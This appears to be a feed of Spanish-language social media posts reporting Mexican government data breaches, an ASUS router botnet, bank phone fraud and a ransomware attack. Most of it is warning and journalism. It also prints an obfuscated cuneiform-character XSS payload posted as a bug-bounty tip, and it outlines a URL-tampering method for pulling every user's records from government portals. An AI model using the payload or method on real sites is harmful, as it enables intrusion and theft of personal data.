¡Esto es una bomba, motivo de escándalo nacional! (NO EXAGERO)
«En algunos casos, observaron la transmisión sin protección de información de inteligencia sensible sobre actividades como el narcotráfico».
Lo peor: avisaron a la @GN_MEXICO_ y nunca les contestaron.
Esta semana, Sc0rp10nn ha vulnerado de manera reciente y actualizada dos de los sistemas más importantes de México: el IMSS y el INFONAVIT. Cabe recordar que estas bases de datos ya habían sido expuestas previamente: la del INFONAVIT en 2016 y los últimos registros de la base nacional del IMSS correspondían a 2017. En este caso, se trata únicamente de información de pensionados, pero de la misma institución.
Además, Sc0rp10nn ha hackeado varios sitios gubernamentales en México. Entre ellos, destaca un caso relacionado con el fiscal de Nuevo León, quien supuestamente lo habría contratado para mantenerse dentro de la red de la fiscalía mediante una Raspberry Pi y extraer todas las carpetas de investigación.
#IMSS #Infonavit
⛔️ | Esto es sumamente grave y muestra por qué NO estamos listos para la CURP biométrica.
Aclaro que lo publico con fines periodísticos y para demostrar una grave vulnerabilidad en diversos portales gubernamentales de México.
Actualmente un hacker vende 73 mil constancias de antecedentes penales directamente extraídas de los sistemas de la @FiscaliaSLP
Esto no es menor, hay fotografías, CURP y otros datos que pueden ser utilizados en casos de fraude y extorsión. Además, sería la misma vulnerabilidad explotada para extraer datos sumamente sensibles —como tipo de sangre— de niños tras un ataque similar a la @SEDUZAC
El problema es que es sumamente sencillo descargar toda esta información. Solo basta la contraseña de un usuario cualquiera (hay millones filtradas) y modificar la URL para obtener los documentos de todos los usuarios del sistema.
Repito, esta falla crítica afecta a diversos portales de gobierno. La información de nadie está segura, pues ya hay ciberdelincuentes que están explotando la vulnerabilidad de forma masiva.
Agradezco a @nicotechtips por su apoyo. Tenemos algunos días documentando este problema y hago un exhorto para que TODAS las autoridades tomen medidas inmediatas para evitar mayores afectaciones (sin descartar la posibilidad que ya se hayan robado millones de datos sin saberlo).
⛔️ | Toda la información de empleo[.]gob[.]mx está expuesta sin ninguna contraseña
Como les comenté, después de una revisión con @nicotechtips, se confirma que es posible extraer toda la base de datos de @empleogob_mx sin ninguna credencial.
Se pueden simular ofertas de trabajo falsas dirigidas a todos los postulantes y cometer fraudes masivos. Estamos hablando de más de 2.5 millones de usuarios expuestos.
Este es el gobierno que cree que es una buena idea crear una Plataforma Única de Identidad para concentrar la información biométrica de todos los mexicanos. ¡Es increíble!
🚨 | Hacker expone ubicación de todos los policías auxiliares de CDMX... y podrían llegar al narcotráfico
Hay datos completos de policías asignados a infraestructuras críticas como el AICM. Delincuentes podrían ubicar a familiares y extorsionar. ¡Grave!
https://t.co/TjcwWQNtH9
🚨 | Hackean escuelas públicas de México... y la @SEP_mx ni sus luces
Al menos ocho instituciones públicas habrían sido vulneradas exponiendo información personal de más de 14 mil estudiantes, docentes y administrativos.
Les cuento en este hilo la historia. 👇🏻
Recomiendo dos canales de Telegram de DLM Monitor.
Uno recopila datos de foros de la deep web en formato JSON. El otro monitorea vulnerabilidades CVE desde diversas fuentes.
Ambos son recursos clave para investigaciones de ciberseguridad e inteligencia de fuentes abiertas.
CVE Detector
https://t.co/U3i7M6QPbX
Data Leak Monitor
https://t.co/Gjeuqzv5kN
an XSS payload, Cuneiform-alphabet based
𒀀='',𒉺=!𒀀+𒀀,𒀃=!𒉺+𒀀,𒇺=𒀀+{},𒌐=𒉺[𒀀++],
𒀟=𒉺[𒈫=𒀀],𒀆=++𒈫+𒀀,𒁹=𒇺[𒈫+𒀆],𒉺[𒁹+=𒇺[𒀀]
+(𒉺.𒀃+𒇺)[𒀀]+𒀃[𒀆]+𒌐+𒀟+𒉺[𒈫]+𒁹+𒌐+𒇺[𒀀]
+𒀟][𒁹](𒀃[𒀀]+𒀃[𒈫]+𒉺[𒀆]+𒀟+𒌐+"(𒀀)")()
#bugbounty#bugbountytips#cybersecurity
Más de 1900 Workflows de #n8n en español y un GPT que Crea tus Flujos al Instante
Organicé más de 1900 workflows de n8n para documentarlos en español y que cualquiera pueda usarlos como inspiración para sus propias automatizaciones: https://t.co/Y5vh8ehKHu
De paso, hice un scrapeo de la documentación oficial de n8n y, juntando todo el contenido que se organizó, lo integré en este GPT personalizado: https://t.co/U7ajReIGEW
Este asistente te ayuda a crear o encontrar los flujos que necesitas para automatizar tus procesos. Lo comparto por aquí porque seguro les aportará valor.
⚠️🇲🇽Alerta: Se ha reportado una filtración de datos que afecta a la Universidad Autónoma de Nuevo León (#UANL), comprometiendo información sensible de su comunidad académica.
⚠️🇲🇽Alerta: Se detectó en foros clandestinos la venta de un servicio ilegal de datos personales sensibles, como pasaportes, tarjetas de identificación, licencias de conducir y "Fullz" (paquetes completos con información como números de seguridad social y fechas de nacimiento),
🛑 ¿Estás ayudando a un ciberataque mundial sin que lo sepas?
Más de 9,000 routers ASUS fueron hackeados por una red secreta llamada AyySSHush.
Así que tu módem casero o de oficina podría estar controlado a distancia por atacantes.
📡 ¿Cómo lo lograron?
Usaron una falla antigua (CVE-2023-39780) que permite entrar sin contraseña.
Instalan una llave SSH que les da acceso silencioso cada vez que enciendes el router.
Incluso si actualizas el sistema, la puerta sigue abierta.
🔍 No usan virus. No ves anuncios. No se cae tu internet.
Pero el tráfico de tu red puede estar siendo desviado y espiado.
GreyNoise, firma internacional de ciberseguridad, dice que esta campaña lleva meses activa. Todo indica que hay un Estado detrás.
⚠️ ¿Qué modelos ASUS están en riesgo?
1. RT-AC3100
2. RT-AC3200
3. RT-AX55
… y otros modelos vulnerables si no están actualizados.
Y no son los únicos. También se han detectado ataques similares en routers Cisco, D-Link, QNAP y Linksys.
🔐 ¿Cómo saber si fuiste víctima?
Actualiza tu router a la última versión del firmware desde el sitio oficial de ASUS.
Haz un reinicio de fábrica. Esto borra cualquier cambio no autorizado.
Revisa si hay llaves extrañas en el archivo authorized_keys.
Bloquea estas IPs sospechosas si manejas redes empresariales:
101.99.91.151
101.99.94.173
79.141.163.179
111.90.146.237
📵 | Grabé otro intento de fraude de BBVA... ¡y es mucho más peligroso de lo que parece!
Sí, hice enojar a la supuesta asesora con datos falsos, terminó casi gritando y fue gracioso; sin embargo, hay que alertar una serie de cosas. Esto no es un juego:
1. Utilizan técnicas avanzadas para suplantar el número REAL de @BBVA_Mex (caller ID spoofing). El teléfono detectó anomalías y por eso —de forma automática— desplegó una advertencia. Asimismo, destaca que se visualiza el nombre de «Bancomer», lo cual también es una alerta debido a que el banco ya no se llama así (lo hacen para evadir ciertos filtros).
2. El modus operandi es similar al reportado en varias ocasiones: te advierten de un cargo —evidentemente falso— para ponerte en alerta. Posteriormente, buscan darte asesoría para rechazar dicho cargo; no obstante, lo que buscan en realidad es que les concedas acceso a tu app, ya que solo funciona en un solo dispositivo, por lo que piden que la desactives para —supuestamente— arreglar el problema.
3. El paso más preocupante es que efectivamente logran bloquear tu app, lo que usan como pretexto para que la desinstales (con el pretexto de solucionar el problema). En realidad, solo hicieron múltiples intentos fallidos para acceder y el bloqueo lo hace BBVA de forma automática como medida de protección.
Muchas personas caen al ver su app bloqueada. Tengan mucho cuidado.
P. D.: Lo mejor es evitar cualquier plática y no replicar lo que yo hice en esta llamada. Yo lo hago con la finalidad de alertarlos y tratar de generar información real sobre cómo operan, pero quiero dejar en claro que hacer esto los pone en riesgo.
🧵 ¿Sabías que el gobierno de #Colima 🇲🇽 está en crisis tras un ciberataque con ransomware que cifró todos sus archivos?
El grupo #Devman tomó control total de su red. Esto va mucho más allá de un simple hackeo. Sigue leyendo 👇 #Ciberseguridad#Ransomware